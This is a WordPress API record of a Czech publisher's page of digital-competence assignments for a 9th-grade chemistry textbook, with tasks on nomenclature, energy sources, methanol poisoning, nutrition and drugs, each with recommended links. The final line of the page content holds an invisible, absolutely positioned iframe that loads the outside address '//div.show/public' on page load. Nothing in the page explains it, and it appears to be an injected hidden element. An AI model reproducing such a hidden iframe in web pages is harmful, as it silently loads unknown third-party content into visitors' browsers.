{"id":18680,"date":"2024-09-02T09:13:40","date_gmt":"2024-09-02T07:13:40","guid":{"rendered":"https:\/\/www.nns.cz\/blog\/?page_id=18680"},"modified":"2025-06-26T16:25:52","modified_gmt":"2025-06-26T14:25:52","slug":"chemie-9","status":"publish","type":"page","link":"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/chemie-9\/","title":{"rendered":"Chemie 9\u00a0\u00davod do obecn\u00e9 a\u00a0organick\u00e9 chemie, biochemie a&nbsp;dal\u0161\u00edch chemick\u00fdch obor\u016f\u00a0"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-text-align-right\"><a href=\"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/\" rel=\"noopener\">zp\u011bt na v\u00fdb\u011br titulu<\/a><\/h4>\n\n\n\n<h3 class=\"wp-block-heading\">Vyu\u017eili jste n\u011bkter\u00fd z&nbsp;n\u00e1m\u011bt\u016f ve v\u00fduce, m\u00e1te n\u00e1m\u011bty nebo p\u0159ipom\u00ednky? Kontaktujte n\u00e1s na <a href=\"mailto:digi@nns.cz\">digi@nns.cz<\/a>.<\/h3>\n\n\n\n<p>N\u00e1m\u011bty budou pr\u016fb\u011b\u017en\u011b aktualizov\u00e1ny a&nbsp;vylep\u0161ov\u00e1ny.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">I. OPAKOV\u00c1N\u00cd U\u010cIVA 8. RO\u010cN\u00cdKU<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol ke kapitole <em>Opakov\u00e1n\u00ed u\u010diva 8.&nbsp;ro\u010dn\u00edku <\/em>na str.&nbsp;7\u201311<\/h2>\n\n\n\n<p>Zopakujte si chemick\u00e9 n\u00e1zvoslov\u00ed.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.onlinecviceni.cz\/exc\/list_topic_oth2.php?subj=chem\">https:\/\/www.onlinecviceni.cz\/exc\/list_topic_oth2.php?subj=chem<\/a><br><a href=\"https:\/\/nazvoslovi.cz\/\">https:\/\/nazvoslovi.cz\/<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Kyselost a&nbsp;z\u00e1saditost l\u00e1tek <\/em>na str.&nbsp;11<\/h2>\n\n\n\n<p>Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed zapi\u0161te postup prvn\u00ed pomoci p\u0159i&nbsp;polept\u00e1n\u00ed kyselinami a&nbsp;z\u00e1sadami.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/skoleniprvnipomoci.cz\/vyukovy-portal\/poleptani\/\">https:\/\/skoleniprvnipomoci.cz\/vyukovy-portal\/poleptani\/<\/a><br><a href=\"https:\/\/www.zzsmsk.cz\/Default.aspx?clanek=3561\">https:\/\/www.zzsmsk.cz\/Default.aspx?clanek=3561<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">II. REDOXN\u00cd REAKCE<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Redoxn\u00ed reakce kov\u016f \u2013 V\u00fdroba \u017eeleza <\/em>na str.&nbsp;15\u201316<\/h2>\n\n\n\n<p>Zhl\u00e9dn\u011bte video o&nbsp;v\u00fdrob\u011b \u017eeleza ve vysok\u00e9 peci a&nbsp;zkuste odpov\u011bd\u011bt na ot\u00e1zky:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Jak\u00e9 funkce pln\u00ed koks na za\u010d\u00e1tku procesu?<\/li>\n\n\n\n<li>Z&nbsp;\u010deho se koks vyr\u00e1b\u00ed?<\/li>\n\n\n\n<li>Co d\u011bl\u00e1 \u017ehav\u00fd koks na vzduchu?<\/li>\n\n\n\n<li>Co d\u011bje ve sp\u00e9k\u00e1rn\u011b rud? Pro\u010d ve vysok\u00e9 peci nem\u016f\u017ee b\u00fdt pou\u017eita samotn\u00e1 prachov\u00e1 sm\u011bs rudy s&nbsp;rozemlet\u00fdm koksem?<\/li>\n\n\n\n<li>Co ve vysok\u00e9 peci vznik\u00e1 redukc\u00ed \u017eelezn\u00e9 rudy?<\/li>\n\n\n\n<li>Jak vysok\u00e1 m\u016f\u017ee b\u00fdt vnit\u0159n\u00ed teplota ho\u0159en\u00ed v&nbsp;ni\u017e\u0161\u00ed, roz\u0161\u00ed\u0159en\u00e9 \u010d\u00e1sti vysok\u00e9 pece?<\/li>\n\n\n\n<li>Jak \u010dasto se prov\u00e1d\u00ed tzv.&nbsp;odpich \u017eeleza?<\/li>\n\n\n\n<li>Je t\u011b\u017e\u0161\u00ed tekut\u00e9 \u017eelezo, nebo struska?<\/li>\n\n\n\n<li>Jak dlouho b\u00fdv\u00e1 vysok\u00e1 pec v&nbsp;provozu?<\/li>\n\n\n\n<li>Pro\u010d je pot\u0159eba surov\u00e9 \u017eelezo zpracovat na ocel?<\/li>\n\n\n\n<li>Kter\u00e9 p\u0159\u00edklady v\u00fdrobk\u016f z&nbsp;ocele jsou v&nbsp;dokumentu uvedeny?<\/li>\n<\/ol>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br>Jak se vyr\u00e1b\u00ed ocel v&nbsp;LIBERTY Ostrava?<br><a href=\"https:\/\/www.youtube.com\/watch?v=4zcymEfV_Xc\">https:\/\/www.youtube.com\/watch?v=4zcymEfV_Xc<\/a><br><a href=\"https:\/\/edu.ceskatelevize.cz\/video\/1119-vyroba-zeleza-ve-vysoke-peci\">https:\/\/edu.ceskatelevize.cz\/video\/1119-vyroba-zeleza-ve-vysoke-peci<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">III. ZDROJE ENERGIE<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol ke kapitole <em>Zdroje energie <\/em>na str.&nbsp;21\u201328<\/h2>\n\n\n\n<p>Vyhledejte, kter\u00fdm subjekt\u016fm ve va\u0161em kraji\/okresu byla ud\u011blena licence k&nbsp;v\u00fdrob\u011b elekt\u0159iny. Je t\u0159eba zvolit z&nbsp;v\u00fdb\u011bru u&nbsp;pol\u00ed\u010dek P\u0159edm\u011bt podnik\u00e1n\u00ed, Stav \u017e\u00e1dosti, Kraj, pop\u0159.&nbsp;Okres a&nbsp;zvolit Filtr.<\/p>\n\n\n\n<p>Doporu\u010den\u00fd zdroj:<br><a href=\"https:\/\/eru.gov.cz\/vyhledavac-licenci\">https:\/\/eru.gov.cz\/vyhledavac-licenci<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Neobnoviteln\u00e9 zdroje energie \u2013 Uhl\u00ed<\/em> na str.&nbsp;22<\/h2>\n\n\n\n<p>Zjist\u011bte, zda v&nbsp;\u010cR v&nbsp;letech 2012\u20132022 do\u0161lo k&nbsp;poklesu, \u010di&nbsp;r\u016fstu t\u011b\u017eby \u010dern\u00e9ho uhl\u00ed.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.mpo.gov.cz\/assets\/cz\/energetika\/statistika\/tuha-paliva\/2024\/2\/Uhli-2012-2022_2.pdf\">https:\/\/www.mpo.gov.cz\/assets\/cz\/energetika\/statistika\/tuha-paliva\/2024\/2\/Uhli-2012-2022_2.pdf<\/a><br><a href=\"https:\/\/cgs.gov.cz\/statni-geologicka-sluzba\/nerostne-suroviny\">https:\/\/cgs.gov.cz\/statni-geologicka-sluzba\/nerostne-suroviny<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Obnoviteln\u00e9 zdroje energie \u2013 Slune\u010dn\u00ed z\u00e1\u0159en\u00ed<\/em> na str.&nbsp;27<\/h2>\n\n\n\n<p>Vyhledejte informace o&nbsp;fotovoltaick\u00e9 elektr\u00e1rn\u011b Ralsko a&nbsp;vyhledejte ji na map\u011b. Zjist\u011bte, ve kter\u00e9m kraji se nach\u00e1z\u00ed a&nbsp;kter\u00e1 v\u011bt\u0161\u00ed m\u011bsta le\u017e\u00ed v&nbsp;jej\u00ed bl\u00edzkosti.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.cez.cz\/cs\/o-cez\/vyrobni-zdroje\/obnovitelne-zdroje\/slunce\/provozovane-fotovoltaicke-elektrarny\/fotovoltaicke-elektrarny-ralsko-a-mimon-58088\">https:\/\/www.cez.cz\/cs\/o-cez\/vyrobni-zdroje\/obnovitelne-zdroje\/slunce\/provozovane-fotovoltaicke-elektrarny\/fotovoltaicke-elektrarny-ralsko-a-mimon-58088<\/a><br><a href=\"https:\/\/mapy.cz\/zakladni?source=base&amp;id=1914057&amp;x=14.8865061&amp;y=50.6005840&amp;z=17\">https:\/\/mapy.cz\/zakladni?source=base&amp;id=1914057&amp;x=14.8865061&amp;y=50.6005840&amp;z=17<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">IV. ORGANICK\u00c1 CHEMIE<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Zdroje organick\u00fdch slou\u010denin<\/em> na str.&nbsp;32<\/h2>\n\n\n\n<p>Vyhledejte informace o&nbsp;zdroj\u00edch organick\u00fdch slou\u010denin. Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed (nap\u0159.&nbsp;PowerPoint) p\u0159ipravte prezentaci. M\u016f\u017eete v&nbsp;n\u00ed vyu\u017e\u00edt i&nbsp;fotografie z&nbsp;internetu, pracujte v\u0161ak pouze s&nbsp;voln\u00fdmi zdroji fotografi\u00ed.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/pixabay.com\/cs\/\">https:\/\/pixabay.com\/cs\/<\/a><br><a href=\"https:\/\/www.flickr.com\/photos\/tags\/flicker\/\">https:\/\/www.flickr.com\/photos\/tags\/flicker\/<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">V. UHLOVOD\u00cdKY<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol ke kapitole <em>Uhlovod\u00edky<\/em> na str.&nbsp;35\u201346<\/h2>\n\n\n\n<p>Zopakujte si kreslen\u00ed molekul ve speci\u00e1ln\u00edm softwaru ChemSketch. Vyberte si jeden alkan, jeden alkyn a&nbsp;jeden aren a&nbsp;vytvo\u0159te jejich modely.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.acdlabs.com\/resources\/free-chemistry-software-apps\/chemsketch-freeware\/\">https:\/\/www.acdlabs.com\/resources\/free-chemistry-software-apps\/chemsketch-freeware\/<\/a><br><a href=\"https:\/\/www.slunecnice.cz\/sw\/acd-chemsketch\/\">https:\/\/www.slunecnice.cz\/sw\/acd-chemsketch\/<\/a><br><a href=\"https:\/\/www.instaluj.cz\/acd-chemsketch\">https:\/\/www.instaluj.cz\/acd-chemsketch<\/a><br><a href=\"https:\/\/is.muni.cz\/www\/veru\/downloads\/kurzy\/chemeditory\/Navod_ChemSketch.pdf\">https:\/\/is.muni.cz\/www\/veru\/downloads\/kurzy\/chemeditory\/Navod_ChemSketch.pdf<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">IV. DERIV\u00c1TY UHLOVOD\u00cdK\u016e<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Kysl\u00edkat\u00e9 deriv\u00e1ty \u2013 methanol<\/em> na str.&nbsp;56<\/h2>\n\n\n\n<p>Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed p\u0159ipravte prezentaci o&nbsp;tom, jak m\u016f\u017ee doj\u00edt k&nbsp;otrav\u011b methanolem, jak ji rozpozn\u00e1me, jak p\u0159i&nbsp;n\u00ed poskytnout prvn\u00ed pomoc a&nbsp;jak\u00e9 mohou b\u00fdt jej\u00ed n\u00e1sledky.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.lkcr.cz\/doc\/clanky_file\/jak-lecit-otravu-metanolem-99324.pdf\">https:\/\/www.lkcr.cz\/doc\/clanky_file\/jak-lecit-otravu-metanolem-99324.pdf<\/a><br><a href=\"https:\/\/www.krizport.cz\/ohrozeni\/nebezpecne-latky-v-jmk\/methanol\">https:\/\/www.krizport.cz\/ohrozeni\/nebezpecne-latky-v-jmk\/methanol<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">VII. P\u0158\u00cdRODN\u00cd L\u00c1TKY<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol ke kapitole <em>P\u0159\u00edrodn\u00ed l\u00e1tky<\/em> na str.&nbsp;69\u201382<\/h2>\n\n\n\n<p>Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed vytvo\u0159te plak\u00e1t se sch\u00e9matem slo\u017een\u00ed \u017eiv\u00e9 hmoty dle vzoru na str.&nbsp;69. Toto sch\u00e9ma dopl\u0148te o&nbsp;p\u0159\u00edklady organick\u00fdch l\u00e1tek s&nbsp;jejich vzorci a&nbsp;stru\u010dn\u00fdm uveden\u00edm v\u00fdskytu a&nbsp;vyu\u017eit\u00ed.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">VIII. CHEMIE KOLEM N\u00c1S<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Potraviny <\/em>na str.&nbsp;84<\/h2>\n\n\n\n<p>Zjist\u011bte, zda spot\u0159eba potravin v&nbsp;\u010cR v&nbsp;posledn\u00edch dvou letech vzrostla, klesla, \u010di&nbsp;zda dlouhodob\u011b z\u016fst\u00e1v\u00e1 nem\u011bnn\u00e1.<\/p>\n\n\n\n<p>Doporu\u010den\u00fd zdroj:<br><a href=\"https:\/\/csu.gov.cz\/spotreba-potravin?pocet=10&amp;start=0&amp;podskupiny=276&amp;razeni=-datumVydani\">https:\/\/csu.gov.cz\/spotreba-potravin?pocet=10&amp;start=0&amp;podskupiny=276&amp;razeni=-datumVydani<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Slo\u017een\u00ed potravy<\/em> na str.&nbsp;84\u201385<\/h2>\n\n\n\n<p>V&nbsp;u\u010debnici a&nbsp;na internetu zjist\u011bte, jak\u00e9 jsou z\u00e1sady spr\u00e1vn\u00e9 v\u00fd\u017eivy. Vytvo\u0159te j\u00eddeln\u00ed\u010dek na jeden den, kter\u00fd by tyto z\u00e1sady dodr\u017eoval. Spole\u010dn\u011b m\u016f\u017eete vytvo\u0159it datab\u00e1zi j\u00eddeln\u00ed\u010dk\u016f na ka\u017ed\u00fd den spl\u0148uj\u00edc\u00ed z\u00e1sady zdrav\u00e9 v\u00fd\u017eivy.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.nzip.cz\/clanek\/173-zasady-spravne-vyzivy\">https:\/\/www.nzip.cz\/clanek\/173-zasady-spravne-vyzivy<\/a><br><a href=\"https:\/\/www.stobklub.cz\/clanek\/skladba-jidla\/\">https:\/\/www.stobklub.cz\/clanek\/skladba-jidla\/<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>V\u00fd\u017eivov\u00e1 hodnota potravin<\/em> na str.&nbsp;85<\/h2>\n\n\n\n<p>Na obalech zjist\u011bte slo\u017een\u00ed a&nbsp;energetickou hodnotu va\u0161ich obl\u00edben\u00fdch pochutin (bramb\u016frky, solen\u00e9 ara\u0161\u00eddy apod.). Ur\u010dete, jak\u00fd pod\u00edl v&nbsp;doporu\u010den\u00e9m denn\u00edm p\u0159\u00edjmu energie tvo\u0159\u00ed energie z\u00edskan\u00e1 z&nbsp;jednoho s\u00e1\u010dku t\u011bchto pochutin (nutno p\u0159epo\u010d\u00edtat na spr\u00e1vnou hmotnost!). Zjist\u011bte tak\u00e9, zda jsou v\u0161echny jejich slo\u017eky (sacharidy, b\u00edlkoviny, tuky) ve spr\u00e1vn\u00e9m pom\u011bru. Obdobn\u011b postupujte i&nbsp;p\u0159i&nbsp;zji\u0161t\u011bn\u00ed slo\u017een\u00ed a&nbsp;energetick\u00e9 hodnoty va\u0161eho obl\u00edben\u00e9ho n\u00e1poje. Zamyslete se, jak\u00e9 d\u016fsledky by mohlo m\u00edt, pokud by tyto pochutiny a&nbsp;n\u00e1poje byly pravidelnou sou\u010d\u00e1st\u00ed va\u0161eho j\u00eddeln\u00ed\u010dku.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.kaloricke-tabulky.cz\/nastroje\/denni-kaloricky-prijem\">https:\/\/www.kaloricke-tabulky.cz\/nastroje\/denni-kaloricky-prijem<\/a><br><a href=\"https:\/\/www.stobklub.cz\/clanek\/skladba-jidla\/\">https:\/\/www.stobklub.cz\/clanek\/skladba-jidla\/<\/a><br><a href=\"https:\/\/fitsmart.cz\/bazalni-metabolismus-hubnuti-kalkulacka-denni-prijem-kalorii-vzpocet\/\">https:\/\/fitsmart.cz\/bazalni-metabolismus-hubnuti-kalkulacka-denni-prijem-kalorii-vzpocet\/<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Chemie a&nbsp;zem\u011bd\u011blstv\u00ed \u2013 Alternativn\u00ed metody v&nbsp;zem\u011bd\u011blstv\u00ed<\/em> na str.&nbsp;90<\/h2>\n\n\n\n<p>Zjist\u011bte, jak\u00e9 jsou z\u00e1sady integrovan\u00e9 produkce zeleniny. Kter\u00e9 v\u00fdrobky mohou dan\u00e9 logo pou\u017e\u00edvat?<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/zucm.cz\/unie\/svaz-pro-ipz\">https:\/\/zucm.cz\/unie\/svaz-pro-ipz<\/a><br><a href=\"https:\/\/www.sispo.cz\/integrovana-produkce\">https:\/\/www.sispo.cz\/integrovana-produkce<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Chemie a&nbsp;zem\u011bd\u011blstv\u00ed \u2013 Alternativn\u00ed metody v&nbsp;zem\u011bd\u011blstv\u00ed<\/em> na str.&nbsp;90<\/h2>\n\n\n\n<p>Zjist\u011bte, kter\u00e9 logo ozna\u010duje tzv.&nbsp;n\u00e1rodn\u00ed zna\u010den\u00ed biov\u00fdrobku a&nbsp;kter\u00e9 tzv.&nbsp;evropsk\u00e9 zna\u010den\u00ed. Co by v\u00e1m mohlo napov\u011bd\u011bt? Za jak\u00fdch podm\u00ednek lze tato loga na v\u00fdrobku uv\u00e1d\u011bt?<\/p>\n\n\n\n<p>Doporu\u010den\u00fd zdroj:<br><a href=\"https:\/\/mze.gov.cz\/public\/portal\/mze\/zemedelstvi\/ekologicke-zemedelstvi\/dokumenty-statistiky-formulare\/loga-a-znaceni\">https:\/\/mze.gov.cz\/public\/portal\/mze\/zemedelstvi\/ekologicke-zemedelstvi\/dokumenty-statistiky-formulare\/loga-a-znaceni<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Chemie a&nbsp;zdrav\u00ed \u2013 L\u00e9\u010diva<\/em> na str.&nbsp;91<\/h2>\n\n\n\n<p>Zjist\u011bte, jak zach\u00e1zet s&nbsp;l\u00e9ky po&nbsp;uplynut\u00ed doby pou\u017eitelnosti (exspirace). Co hroz\u00ed p\u0159i&nbsp;nespr\u00e1vn\u00e9m nakl\u00e1d\u00e1n\u00ed s&nbsp;l\u00e9kov\u00fdm odpadem?<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/www.prumyslovaekologie.cz\/info\/prosle-leky-do-kose-nepatri-tak-kam-s-nimi\">https:\/\/www.prumyslovaekologie.cz\/info\/prosle-leky-do-kose-nepatri-tak-kam-s-nimi<\/a><br><a href=\"https:\/\/www.enviweb.cz\/115555\">https:\/\/www.enviweb.cz\/115555<\/a><br><a href=\"https:\/\/www.benu.cz\/proc-prosle-leky-vracet-zpet-do-lekarny\">https:\/\/www.benu.cz\/proc-prosle-leky-vracet-zpet-do-lekarny<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Nebezpe\u010d\u00ed chemie \u2013 Drogy<\/em> na str.&nbsp;99\u2013101<\/h2>\n\n\n\n<p>Zjist\u011bte, co je psychoaktivn\u00ed l\u00e1tka kratom a&nbsp;ve&nbsp;kter\u00e9 v\u011bkov\u00e9 kategorii je u\u017e\u00edv\u00e1na nej\u010dast\u011bji. Zjist\u011bte, co je to z\u00e1vislost a&nbsp;jak se projevuje.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/szu.cz\/wp-content\/uploads\/2024\/06\/Narodni-vyzkum-uzivani-tabaku-a-alkoholu-v-Ceske-republice-2023-3.pdf\">https:\/\/szu.cz\/wp-content\/uploads\/2024\/06\/Narodni-vyzkum-uzivani-tabaku-a-alkoholu-v-Ceske-republice-2023-3.pdf<\/a> (str.&nbsp;66)<br><a href=\"https:\/\/www.policie.cz\/clanek\/kratom.aspx\">https:\/\/www.policie.cz\/clanek\/kratom.aspx<\/a><br><a href=\"https:\/\/www.onlinemedical.cz\/nase-novinky-blog\/kratom--potencialni-rizika-a-nebezpeci-skryta-v-prirodnim-zazraku\/?srsltid=AfmBOop4VqexmOCllbQmHQycTRP2vPoOJdv-Lcd5xaL4B90OPzI6Owjd\">https:\/\/www.onlinemedical.cz\/nase-novinky-blog\/kratom&#8211;potencialni-rizika-a-nebezpeci-skryta-v-prirodnim-zazraku\/?srsltid=AfmBOop4VqexmOCllbQmHQycTRP2vPoOJdv-Lcd5xaL4B90OPzI6Owjd<\/a><br><a href=\"https:\/\/www.seznamzpravy.cz\/clanek\/domaci-zivot-v-cesku-kratom-ocima-lekare-na-zapade-neprobadany-riziko-zavislosti-je-vysoke-221049\">https:\/\/www.seznamzpravy.cz\/clanek\/domaci-zivot-v-cesku-kratom-ocima-lekare-na-zapade-neprobadany-riziko-zavislosti-je-vysoke-221049<\/a><br><a href=\"https:\/\/www.nzip.cz\/kategorie\/125-zavislosti-zakladni-informace\">https:\/\/www.nzip.cz\/kategorie\/125-zavislosti-zakladni-informace<\/a><br><a href=\"https:\/\/www.nzip.cz\/kategorie\/127-nelegalni-navykove-latky\">https:\/\/www.nzip.cz\/kategorie\/127-nelegalni-navykove-latky<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u00dakol k&nbsp;podkapitolce <em>Chemie a&nbsp;\u017eivotn\u00ed prost\u0159ed\u00ed \u2013 Zne\u010di\u0161t\u011bn\u00ed \u017eivotn\u00edho prost\u0159ed\u00ed<\/em> na str.&nbsp;102<\/h2>\n\n\n\n<p>Zjist\u011bte dal\u0161\u00ed informace o&nbsp;zne\u010di\u0161t\u011bn\u00ed \u017eivotn\u00edho prost\u0159ed\u00ed v&nbsp;\u010cR a&nbsp;vytvo\u0159te my\u0161lenkovou mapu na toto t\u00e9ma.<\/p>\n\n\n\n<p>Doporu\u010den\u00e9 zdroje:<br><a href=\"https:\/\/mze.gov.cz\/public\/portal\/mze\/voda\/osveta-a-publikace\/publikace-a-dokumenty\/modre-zpravy\">https:\/\/mze.gov.cz\/public\/portal\/mze\/voda\/osveta-a-publikace\/publikace-a-dokumenty\/modre-zpravy<\/a><br><a href=\"https:\/\/www.chmi.cz\/files\/portal\/docs\/uoco\/web_generator\/actual_3hour_data_CZ.html\">https:\/\/www.chmi.cz\/files\/portal\/docs\/uoco\/web_generator\/actual_3hour_data_CZ.html<\/a><br><a href=\"https:\/\/www.casopis.ochranaprirody.cz\/uvodem\/ochrana-pudy-a-zivota-v-ni-je-klicova-pro-nasi-budoucnost\/\">https:\/\/www.casopis.ochranaprirody.cz\/uvodem\/ochrana-pudy-a-zivota-v-ni-je-klicova-pro-nasi-budoucnost\/<\/a><br><a href=\"https:\/\/www.eea.europa.eu\/cs\/signaly\/signaly-2020\/articles\/znecisteni-krajiny-a-pudy-2014\">https:\/\/www.eea.europa.eu\/cs\/signaly\/signaly-2020\/articles\/znecisteni-krajiny-a-pudy-2014<\/a><br><a href=\"https:\/\/products.aspose.app\/diagram\/cs\/mindmap\">https:\/\/products.aspose.app\/diagram\/cs\/mindmap<\/a><br><a href=\"https:\/\/bubbl.us\/\">https:\/\/bubbl.us\/<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Digit\u00e1ln\u00ed kompetence jsou v\u00fdrazn\u011b podporov\u00e1ny tak\u00e9 v&nbsp;MIU\u010d+, kde mohou \u017e\u00e1ci vyu\u017e\u00edvat interaktivn\u00ed \u00falohy a&nbsp;z\u00edsk\u00e1vat dopl\u0148uj\u00edc\u00ed informace formou \u00fakol\u016f s&nbsp;odkazy na ov\u011b\u0159en\u00e1 videa a&nbsp;texty.<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading has-text-align-right\"><a href=\"https:\/\/www.nns.cz\/blog\/digitalni-kompetence\/\" rel=\"noopener\">zp\u011bt na v\u00fdb\u011br titulu<\/a><\/h4>\n\n\n\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>zp\u011bt na v\u00fdb\u011br titulu Vyu\u017eili jste n\u011bkter\u00fd z&nbsp;n\u00e1m\u011bt\u016f ve v\u00fduce, m\u00e1te n\u00e1m\u011bty nebo p\u0159ipom\u00ednky? Kontaktujte n\u00e1s na digi@nns.cz. N\u00e1m\u011bty budou pr\u016fb\u011b\u017en\u011b aktualizov\u00e1ny a&nbsp;vylep\u0161ov\u00e1ny. I. OPAKOV\u00c1N\u00cd U\u010cIVA 8. RO\u010cN\u00cdKU \u00dakol ke kapitole Opakov\u00e1n\u00ed u\u010diva 8.&nbsp;ro\u010dn\u00edku na str.&nbsp;7\u201311 Zopakujte si chemick\u00e9 n\u00e1zvoslov\u00ed. Doporu\u010den\u00e9 zdroje:https:\/\/www.onlinecviceni.cz\/exc\/list_topic_oth2.php?subj=chemhttps:\/\/nazvoslovi.cz\/ \u00dakol k&nbsp;podkapitolce Kyselost a&nbsp;z\u00e1saditost l\u00e1tek na str.&nbsp;11 Ve vhodn\u00e9m digit\u00e1ln\u00edm prost\u0159ed\u00ed zapi\u0161te postup [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":0,"parent":15791,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-18680","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/18680","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/comments?post=18680"}],"version-history":[{"count":10,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/18680\/revisions"}],"predecessor-version":[{"id":20290,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/18680\/revisions\/20290"}],"up":[{"embeddable":true,"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/pages\/15791"}],"wp:attachment":[{"href":"https:\/\/www.nns.cz\/blog\/wp-json\/wp\/v2\/media?parent=18680"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}